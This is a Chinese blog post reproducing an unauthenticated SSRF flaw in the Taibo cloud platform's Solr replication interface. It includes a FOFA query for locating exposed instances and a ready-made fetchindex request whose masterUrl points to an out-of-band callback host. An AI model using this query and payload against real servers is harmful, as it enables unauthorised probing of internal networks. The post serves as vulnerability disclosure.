【漏洞复现】泰博云平台 solr SSRF漏洞

最新推荐文章于 2024-05-20 17:16:41 发布
最新推荐文章于 2024-05-20 17:16:41 发布
阅读量161 收藏
点赞数 3
分类专栏: 漏洞复现 文章标签: 安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_67810151/article/details/137510801
版权

0x01 产品简介

泰博云平台,就是指以电商集群的方式,通过供应链有效连接组成“商务云”生态系统,在产品、服务、营销推广等方面实现资源共享,“物”就是线下实体店网络,以众包模式,将行业制造商、分销商、零售商,和提供本土化设计、物流、安装的优质服务商,纳入统一的云制造服务体系。

0x02 漏洞概述

泰博云平台存在SSRF漏洞,未授权的攻击者可以通过该漏洞诱使服务器端应用程序向攻击者选择的任意域发出HTTP请求。

0x03 测绘语句

fofa:title="泰博云平台"

0x04 漏洞复现

​
使用burp自带的dnslog

payload:GET /solr/collection1/replication/?command=fetchindex&masterUrl=http://0cdc9itn8qlwksoruooyf4fquh09ozco.oastify.com HTTP/1.1

​

了解本专栏 订阅专栏 解锁全文 超级会员免费看
从不学安全
关注
  • 3
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
泰博云平台 replication SSRF漏洞复现
0xSec
04-06 398
泰博云平台 replication 接口存在服务器请求伪造漏洞。因此攻击者可利用该漏洞在未经身份验证的情况下访问某些受限资源.获取内部服务器信息,使系统处于极不安全状态。
(CVE-2021-27905)Apache Solr ssrf 漏洞复现
鸣蜩十四的博客
08-09 1501
简介 Apache Solr是美国阿帕奇(Apache)基金会的一款基于Lucene(一款全文搜索引擎)的搜索服务器,使用Java语言开发,主要基于http和Apache Lucene实现的,该产品支持层面搜索、垂直搜索、高亮显示搜索结果等。 漏洞描述 Apache Solr 8.8.2之前版本存在安全漏洞,Apache Solr 中的 ReplicationHandler(通常注册在 Solr core下的“/replication”)有一个“masterUrl”(也是“leaderUrl”别名)参数,用
中国房地产将在三年内崩溃!(zt)
净心编程
12-29 2480
中国房地产市场三年内见顶       资本是趋利的,一旦中国的证券市场机制合理了,有了价值发现功能,更有了优化资产配置功能。中国股市将面临持续数年熊市后的大底,这对国内缺少投资渠道的庞大资本来说无异是一个千载难逢的机会。一个整体上机制合理的股市整体回报率通常要在10%以上的(美国从1922年到1992年的60年内,股市平均实际回报率达到10%。),当然中国如果出现了一个牛市的大底的话,囤积在房地产
寻求上海北京工作机会,四年软件开发经验。
yigekongge的专栏
09-19 1164
 王涛个人信息§         性    别:男§         毕业院校:天津理工大学§         电    话:13761719583(沪)   13512828304(津,京)§         电子邮件:[email protected]教育经历[
平面几何常用定理、结论总结 第一篇 三角形及其引线、引圆
Daze
07-17 1万+
1.  勾股定理(毕达哥拉斯定理) 2.  射影定理(欧几里得定理) 在Rt△ABC中,∠ACB=90°,cd是斜边ab上的高,则有射影定理如下:①CD2=AD·DB②BC2=BD·BA③AC2=AD·AB④AC·BC=AB·CD(等积式,可用面积来证明) 3.  三角形的三条中线交于一点,并且,各中线被这个点分成2:1的两部分 4.  四边形两边中心的连线和两条对角线中心的连线交于一点
厉害了!13个GIS开源软件
vector5210的专栏
05-31 1万+
No.1 QGIS (原称Quantum GIS)        QGIS(原称Quantum GIS)是一个跨平台的桌面GIS软件。它提供数据的显示、编辑和分析功能,可以自动生成地图,并且能够处理地理空间数据,最后形成你期待的地图数据。它于2004年成为开源地理空间基金会的一个孵化项目。稳定版本是2.14.0 (Essen)。   QGIS是以C++、Python
在客户激增、重要人事任命和合作伙伴强力参与的推动下,Neo4j 亚太区业绩实现超100%增长
Jennifer726的博客
04-13 523
中国北京,2022年4月6日 — 全球领先的图数据平台Neo4jⓇ过去一年在亚太区的业绩实现了超过100% 的增长。激增的客户需求来自包括金融服务、旅游、零售、公共部门和医疗保健机构在内的众多行业,寻求其最复杂问题的解决方案。 Forrester Consulting针对 Neo4j 图数据平台所做的Total Economic Impact™ (TEI) 研究 进一步印证了公司经营效益的提升。该研究表明Neo4j可以帮助一家复合型企业三年内实现超过 400%的投资回报。 亚太地区数以百计的机构依赖 N
深圳市科技创新委员会关于2021年高新技术企业培育库拟入库企业名单公示的通知
热门推荐
m0_61283633的博客
04-24 2万+
根据《深圳市高新技术企业培育资助管理办法》(深科技创新规〔2021〕5号)有关要求,2021年高新技术企业培育库入库申请企业中,符合以下条件的企业获得入库资格:   1.未获得过高新技术企业资格;   2.未获得过高新技术企业培育库入库资格;   3.符合市科技行政主管部门确定的当年度高新技术企业认定专家评审成绩达标线,且不高于当年高新技术企业认定资格线。   2021年高新技术企业认定专家评审成绩达标线为65分(含),高新技术企业认定资格线为70分(不含)。   经审核,中开新松智能机器人有限公
lisp 角平分线_证明冯奥贝尔定理的3种方法
weixin_39805998的博客
01-12 1669
怎样证明冯·奥贝尔定理?Von.Aubel定理: 以任意四边形ABCD的边为斜边作四个转向相同的等腰直角三角形ΔABE,ΔBCF,ΔCDG,ΔDAH。则:EG=FH,EG⊥FH。关于上述定理的几点说明:(1),条件是任意四边形,所以不一定是凸四边形;(2),作四个转向相同的等腰直角三角形,所以可以同时向四边形形外或四边形形内,作等腰直角三角形。(3),当四边形退化为三角形时,结论也成立。即A与D,...
泰博排课专家 v4-2-0
05-20
为学校教务人员编制课表提供帮助
赛博朋克按钮.html
02-08
赛博朋克按钮.html
Alibo.vn - Chiết khấu Taobao 1688 Tmall-crx插件
04-01
Alibo.vn还更新了最热的产品淘宝最热产品1688,淘宝网最畅销的产品淘宝1688,顶潮淘宝1688产品上泰博(Doouyin),最热门的产品。Alibo.vn工具是一个帮助Alibovn的客户的工具,淘宝折扣,1688,Tmall,...从数百万...
守护长者安全,平安养老险携手福海街道开展防灾减灾活动
NewsMash的博客
05-15 133
展望未来,平安养老险深圳分公司将持续与更多养老社区携手开展系列活动,合计赠送1000份灭火袋,并推出更多关爱老年人的举措,以实际行动为构建安全、和谐的养老环境贡献力量,为老年人的金色晚年添上温暖色彩,让他们的生活更加安心、舒心。老人们在台下听的投入,并在互动环节踊跃提问。作为平安集团服务养老、保障民生的重要“窗口”,平安养老险始终坚持金融工作的政治性、人民性,以满足人民日益增长的美好生活需要作为高质量发展的出发点和落脚点,公司期待与更多关心老年人福祉的人士携手,共筑“老有所养、老有所依”的中国梦。
[图解]SysML和EA建模住宅安全系统-05
rolt的专栏
05-18 650
作用就是定义属性之间的数学关系
网站有存在哪些类型的漏洞,网站漏洞存在哪些危害,该怎么解决网站漏洞问题
dexunyun的博客
05-14 359
通过使用漏洞扫描VSS服务,我们可以及时发现网站存在的漏洞,有效降低网站漏洞的风险,保障网站安全,满足合规要求。文件上传漏洞是由于网站在处理文件上传功能时没有对上传的文件类型、大小等进行严格的验证和过滤,攻击者利用网站中的文件包含函数,将恶意文件或代码包含到网站中,从而实现远程代码执行或文件读取。网站安全是一个持续的过程,需要我们不断关注,通过及时发现存在的漏洞,我们可以针对性的处理,这样可以有效地减少网站安全漏洞的产生和危害,确保网站的安全稳定运行。同时,采用安全的编程语言和框架,减少漏洞的产生。
RSAC 2024观察:软件供应链安全进入AI+时代
lurenjia404的博客
05-15 920
盘点RSAC会议上软件供应链安全议题的特点、趋势及启示。
高效且安全的传输工具:FileLink跨网文件传输
m0_69398711的博客
05-14 464
同时,它还提供了权限控制功能,例如:文件打开次数、访问时间、禁止截屏、禁止复制、禁止打印、显示水印,有效防止了数据泄露和非法访问。然而,FileLink利用先进的网络技术和协议优化,成功打破了这一局限。它提供广泛的集成支持,权限组件、审批组件均开放API,可与企业现有IT系统充分集成,深度支撑与贯通企业跨网业务流程,致力于打造更全面的数据安全平台。综上所述,FileLink跨网文件传输以其出色的跨网络性能、安全性、多功能性、易用性以及集成扩展能力,成为了现代办公和日常生活中不可或缺的文件传输工具。
Web应用防火墙的重要性
最新发布
XRY_XIAO的博客
05-20 347
Web应用防火墙的重要性
Llama 3 模型家族构建安全可信赖企业级AI应用之 Code Llama (一)
段智华的博客
05-17 858
1、Llama开源模型家族大模型技术、工具和多模态详解:学员将深入了解Meta Llama 3的创新之处,比如其在语言模型技术上的突破,并学习到如何在Llama 3中构建trust and safety AI。8、Llama 3中的DPO原理、算法、组件及具体实现及算法进阶:学习Llama 3中结合使用PPO和DPO算法,剖析DPO的原理和工作机制,详细解析DPO中的关键算法组件,并通过综合项目八从零开始动手实现和测试DPO算法,同时课程将解密DPO进阶技术Iterative DPO及IPO算法。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

从不学安全

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值